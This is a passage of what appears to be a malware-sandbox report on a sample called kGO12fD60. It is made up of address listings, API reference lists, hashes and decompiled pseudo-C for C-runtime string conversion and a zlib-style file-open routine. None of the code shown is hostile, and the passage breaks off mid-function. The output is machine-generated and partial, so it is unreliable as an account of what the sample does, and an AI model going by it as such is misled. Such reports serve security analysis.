                                                                                                                                                                                                        0x004172aa
                                                                                                                                                                                                        0x004172ad
                                                                                                                                                                                                        0x004172b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004172b5
                                                                                                                                                                                                        0x004171c7
                                                                                                                                                                                                        0x004171db
                                                                                                                                                                                                        0x004171dd
                                                                                                                                                                                                        0x004171e2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004171ef
                                                                                                                                                                                                        0x0041721a
                                                                                                                                                                                                        0x0041721c
                                                                                                                                                                                                        0x00417263
                                                                                                                                                                                                        0x00417263
                                                                                                                                                                                                        0x00417263
                                                                                                                                                                                                        0x00417265
                                                                                                                                                                                                        0x00417265
                                                                                                                                                                                                        0x00417267
                                                                                                                                                                                                        0x00417277
                                                                                                                                                                                                        0x0041727d
                                                                                                                                                                                                        0x0041727f
                                                                                                                                                                                                        0x00417281
                                                                                                                                                                                                        0x00417282
                                                                                                                                                                                                        0x00417283
                                                                                                                                                                                                        0x00417286
                                                                                                                                                                                                        0x0041728c
                                                                                                                                                                                                        0x0041728f
                                                                                                                                                                                                        0x00417288
                                                                                                                                                                                                        0x00417288
                                                                                                                                                                                                        0x00417289
                                                                                                                                                                                                        0x00417289
                                                                                                                                                                                                        0x004172a0
                                                                                                                                                                                                        0x004172a0
                                                                                                                                                                                                        0x004172a4
                                                                                                                                                                                                        0x004172a9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417267
                                                                                                                                                                                                        0x00417222
                                                                                                                                                                                                        0x00417223
                                                                                                                                                                                                        0x00417225
                                                                                                                                                                                                        0x00417228
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041722a
                                                                                                                                                                                                        0x0041722a
                                                                                                                                                                                                        0x0041722e
                                                                                                                                                                                                        0x00417233
                                                                                                                                                                                                        0x0041724c
                                                                                                                                                                                                        0x00417252
                                                                                                                                                                                                        0x00417254
                                                                                                                                                                                                        0x00417256
                                                                                                                                                                                                        0x0041725c
                                                                                                                                                                                                        0x0041725c
                                                                                                                                                                                                        0x0041725c
                                                                                                                                                                                                        0x0041725f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041725f
                                                                                                                                                                                                        0x00417235
                                                                                                                                                                                                        0x0041723a
                                                                                                                                                                                                        0x0041723c
                                                                                                                                                                                                        0x0041723e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417240
                                                                                                                                                                                                        0x00417246
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417246
                                                                                                                                                                                                        0x004171f4
                                                                                                                                                                                                        0x00417213
                                                                                                                                                                                                        0x00417213
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004171f4
                                                                                                                                                                                                        0x00417163
                                                                                                                                                                                                        0x00417164
                                                                                                                                                                                                        0x00417169
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041716b
                                                                                                                                                                                                        0x0041716b
                                                                                                                                                                                                        0x00417174
                                                                                                                                                                                                        0x0041718a
                                                                                                                                                                                                        0x00417190
                                                                                                                                                                                                        0x00417192
                                                                                                                                                                                                        0x0041719d
                                                                                                                                                                                                        0x0041719d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041719d
                                                                                                                                                                                                        0x00417194
                                                                                                                                                                                                        0x0041719a
                                                                                                                                                                                                        0x0041719a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041719a
                                                                                                                                                                                                        0x00417176
                                                                                                                                                                                                        0x0041717b
                                                                                                                                                                                                        0x0041717f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417181
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417181
                                                                                                                                                                                                        0x00417157
                                                                                                                                                                                                        0x00417109
                                                                                                                                                                                                        0x004170df
                                                                                                                                                                                                        0x004170e2
                                                                                                                                                                                                        0x004170e5
                                                                                                                                                                                                        0x004170e5
                                                                                                                                                                                                        0x004170e8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,021A18B0), ref: 004170C5
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                        • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                        • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                        • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                        • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3809854901-0
                                                                                                                                                                                                        • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E004057B0(intOrPtr* __eax) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				intOrPtr* _t57;
                                                                                                                                                                                                        				char* _t60;
                                                                                                                                                                                                        				char _t62;
                                                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                                                        				char _t64;
                                                                                                                                                                                                        				intOrPtr _t65;
                                                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                                        				intOrPtr _t69;
                                                                                                                                                                                                        				intOrPtr _t70;
                                                                                                                                                                                                        				intOrPtr _t74;
                                                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                                                        				intOrPtr* _t83;
                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                        				char* _t88;
                                                                                                                                                                                                        				char* _t89;
                                                                                                                                                                                                        				intOrPtr* _t91;
                                                                                                                                                                                                        				intOrPtr* _t93;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				signed int _t98;
                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                        				void* _t101;
                                                                                                                                                                                                        				void* _t102;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t98 = _t97 | 0xffffffff;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                                                                                                                        				_t91 = __eax;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                                                                                                                                                        					_t101 = _t100 + 4;
                                                                                                                                                                                                        					if(_t93 == 0) {
                                                                                                                                                                                                        						L31:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                                                                                                                        						 *_t93 = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                                                                                                                        						 *(_t93 + 0x6c) = _t98;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                                                                                                                                                        						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                                                                                                                        						_t102 = _t101 + 0xc;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                                                                                                                        						_t87 = _t57 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t82 =  *_t57;
                                                                                                                                                                                                        							_t57 = _t57 + 1;
                                                                                                                                                                                                        						} while (_t82 != 0);
                                                                                                                                                                                                        						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                                                                                                                        						_t103 = _t102 + 4;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                                                                                                                        						if(_t60 == 0) {
                                                                                                                                                                                                        							L30:
                                                                                                                                                                                                        							E00405160(0, _t87, _t93);
                                                                                                                                                                                                        							goto L31;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                                                                                                                        							_t88 = _t60;
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							if( *_t91 == 0x72) {
                                                                                                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t63 =  *_t91;
                                                                                                                                                                                                        							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t64 =  *_t91;
                                                                                                                                                                                                        							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                                                                                                                        								__eflags = _t64 - 0x66;
                                                                                                                                                                                                        								if(_t64 != 0x66) {
                                                                                                                                                                                                        									__eflags = _t64 - 0x68;
                                                                                                                                                                                                        									if(_t64 != 0x68) {
                                                                                                                                                                                                        										__eflags = _t64 - 0x52;
                                                                                                                                                                                                        										if(_t64 != 0x52) {
                                                                                                                                                                                                        											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                                                                                                                        											 *_t89 = _t64;
                                                                                                                                                                                                        											_t87 = _t89 + 1;
                                                                                                                                                                                                        											__eflags = _t87;
                                                                                                                                                                                                        											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t98 = _t64 - 0x30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                                                                        							if(_t64 == 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t87 = _t103 + 0x68;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                                                                                                                        								goto L9;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L26:
                                                                                                                                                                                                        							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                                                                                                                        							if(_t65 == 0) {
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(_t65 != 0x77) {
                                                                                                                                                                                                        									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                        									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                                                                                                                        									 *_t93 = _t66;
                                                                                                                                                                                                        									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                                                                                                                        									_t104 = _t103 + 0x14;
                                                                                                                                                                                                        									__eflags = _t67;
                                                                                                                                                                                                        									if(_t67 != 0) {
                                                                                                                                                                                                        										goto L30;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L34;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_push(0x38);
                                                                                                                                                                                                        									_push("1.2.3");
                                                                                                                                                                                                        									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                                                                                                                        									_push(8);
                                                                                                                                                                                                        									_push(0xfffffff1);
                                                                                                                                                                                                        									_push(8);
                                                                                                                                                                                                        									_push(_t98);
                                                                                                                                                                                                        									_push(_t93);
                                                                                                                                                                                                        									_t91 = E00404CE0();
                                                                                                                                                                                                        									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                        									_t104 = _t103 + 0x24;
                                                                                                                                                                                                        									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                                                                                                                        									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                                                                                                                        									if(_t91 != 0 || _t79 == 0) {
                                                                                                                                                                                                        										goto L30;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										L34:
                                                                                                                                                                                                        										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                                                                                                                        										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                                                                                                                                                        										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										_push(_t104 + 0x18);
                                                                                                                                                                                                        										if(__eflags >= 0) {
                                                                                                                                                                                                        											_push(_t69);
                                                                                                                                                                                                        											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                        											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                                                                                                                        											_t70 = E0040CB9D();
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                                                                                                                        										__eflags = _t70;
                                                                                                                                                                                                        										if(_t70 == 0) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                                                                                                                        											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                                                                                                                        												E00405000(_t93, 0);
                                                                                                                                                                                                        												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                                                                                                                        												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                                                                                                                        												__eflags = _t74;
                                                                                                                                                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                                                                                                                        												return _t93;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                                                                                                                        												return _t93;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L42;
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t62 =  *_t83;
                                                                                                                                                                                                        							 *_t88 = _t62;
                                                                                                                                                                                                        							_t83 = _t83 + 1;
                                                                                                                                                                                                        							_t88 = _t88 + 1;
                                                                                                                                                                                                        							if(_t62 != 0) {
                                                                                                                                                                                                        								goto L7;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L42:
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        0x00405819
                                                                                                                                                                                                        0x0040581c
                                                                                                                                                                                                        0x00405824
                                                                                                                                                                                                        0x00405827
                                                                                                                                                                                                        0x0040582b
                                                                                                                                                                                                        0x0040582e
                                                                                                                                                                                                        0x00405831
                                                                                                                                                                                                        0x00405834
                                                                                                                                                                                                        0x00405837
                                                                                                                                                                                                        0x00405837
                                                                                                                                                                                                        0x00405839
                                                                                                                                                                                                        0x0040583a
                                                                                                                                                                                                        0x00405842
                                                                                                                                                                                                        0x00405847
                                                                                                                                                                                                        0x0040584a
                                                                                                                                                                                                        0x0040584f
                                                                                                                                                                                                        0x0040591c
                                                                                                                                                                                                        0x0040591c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405855
                                                                                                                                                                                                        0x00405855
                                                                                                                                                                                                        0x00405859
                                                                                                                                                                                                        0x0040585b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405870
                                                                                                                                                                                                        0x00405872
                                                                                                                                                                                                        0x00405874
                                                                                                                                                                                                        0x00405874
                                                                                                                                                                                                        0x00405877
                                                                                                                                                                                                        0x0040587b
                                                                                                                                                                                                        0x00405881
                                                                                                                                                                                                        0x00405881
                                                                                                                                                                                                        0x00405885
                                                                                                                                                                                                        0x00405889
                                                                                                                                                                                                        0x00405897
                                                                                                                                                                                                        0x00405899
                                                                                                                                                                                                        0x004058a5
                                                                                                                                                                                                        0x004058a7
                                                                                                                                                                                                        0x004058b3
                                                                                                                                                                                                        0x004058b5
                                                                                                                                                                                                        0x004058c1
                                                                                                                                                                                                        0x004058c5
                                                                                                                                                                                                        0x004058c7
                                                                                                                                                                                                        0x004058c7
                                                                                                                                                                                                        0x004058c8
                                                                                                                                                                                                        0x004058b7
                                                                                                                                                                                                        0x004058b7
                                                                                                                                                                                                        0x004058b7
                                                                                                                                                                                                        0x004058a9
                                                                                                                                                                                                        0x004058a9
                                                                                                                                                                                                        0x004058a9
                                                                                                                                                                                                        0x0040589b
                                                                                                                                                                                                        0x0040589b
                                                                                                                                                                                                        0x0040589b
                                                                                                                                                                                                        0x0040588f
                                                                                                                                                                                                        0x00405892
                                                                                                                                                                                                        0x00405892
                                                                                                                                                                                                        0x004058cc
                                                                                                                                                                                                        0x004058cf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004058d1
                                                                                                                                                                                                        0x004058d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004058db
                                                                                                                                                                                                        0x004058db
                                                                                                                                                                                                        0x004058e0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004058e2
                                                                                                                                                                                                        0x004058e4
                                                                                                                                                                                                        0x00405930
                                                                                                                                                                                                        0x0040593f
                                                                                                                                                                                                        0x00405942
                                                                                                                                                                                                        0x00405944
                                                                                                                                                                                                        0x00405949
                                                                                                                                                                                                        0x0040594c
                                                                                                                                                                                                        0x0040594e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405950
                                                                                                                                                                                                        0x00405950
                                                                                                                                                                                                        0x00405953
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405953
                                                                                                                                                                                                        0x004058e6
                                                                                                                                                                                                        0x004058ea
                                                                                                                                                                                                        0x004058ec
                                                                                                                                                                                                        0x004058f1
                                                                                                                                                                                                        0x004058f2
                                                                                                                                                                                                        0x004058f4
                                                                                                                                                                                                        0x004058f6
                                                                                                                                                                                                        0x004058f8
                                                                                                                                                                                                        0x004058f9
                                                                                                                                                                                                        0x00405904
                                                                                                                                                                                                        0x00405906
                                                                                                                                                                                                        0x0040590b
                                                                                                                                                                                                        0x0040590e
                                                                                                                                                                                                        0x00405911
                                                                                                                                                                                                        0x00405916
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405955
                                                                                                                                                                                                        0x00405955
                                                                                                                                                                                                        0x00405955
                                                                                                                                                                                                        0x00405961
                                                                                                                                                                                                        0x00405963
                                                                                                                                                                                                        0x00405967
                                                                                                                                                                                                        0x0040596d
                                                                                                                                                                                                        0x0040596e
                                                                                                                                                                                                        0x0040597c
                                                                                                                                                                                                        0x0040597d
                                                                                                                                                                                                        0x00405970
                                                                                                                                                                                                        0x00405970
                                                                                                                                                                                                        0x00405974
                                                                                                                                                                                                        0x00405975
                                                                                                                                                                                                        0x00405975
                                                                                                                                                                                                        0x00405985
                                                                                                                                                                                                        0x00405988
                                                                                                                                                                                                        0x0040598a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040598c
                                                                                                                                                                                                        0x0040598c
                                                                                                                                                                                                        0x00405990
                                                                                                                                                                                                        0x004059a5
                                                                                                                                                                                                        0x004059ad
                                                                                                                                                                                                        0x004059b6
                                                                                                                                                                                                        0x004059b6
                                                                                                                                                                                                        0x004059b9
                                                                                                                                                                                                        0x004059c5
                                                                                                                                                                                                        0x00405992

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                        • String ID: 1.2.3
                                                                                                                                                                                                        • API String ID: 680241177-2310465506
                                                                                                                                                                                                        • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                        • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                        			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                                        				intOrPtr* _t92;
                                                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                                                        				char _t97;
                                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				signed int _t107;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        				signed int _t113;
                                                                                                                                                                                                        				intOrPtr* _t114;
                                                                                                                                                                                                        				signed int _t118;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                        				char* _t121;
                                                                                                                                                                                                        				signed int _t125;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t133;
                                                                                                                                                                                                        				void* _t134;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t125 = __edx;
                                                                                                                                                                                                        				_t121 = _a4;
                                                                                                                                                                                                        				_t119 = _a8;
                                                                                                                                                                                                        				_t131 = 0;
                                                                                                                                                                                                        				_v12 = _t121;
                                                                                                                                                                                                        				_v8 = _t119;
                                                                                                                                                                                                        				if(_a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = _t121;
                                                                                                                                                                                                        					if(_t121 != 0) {
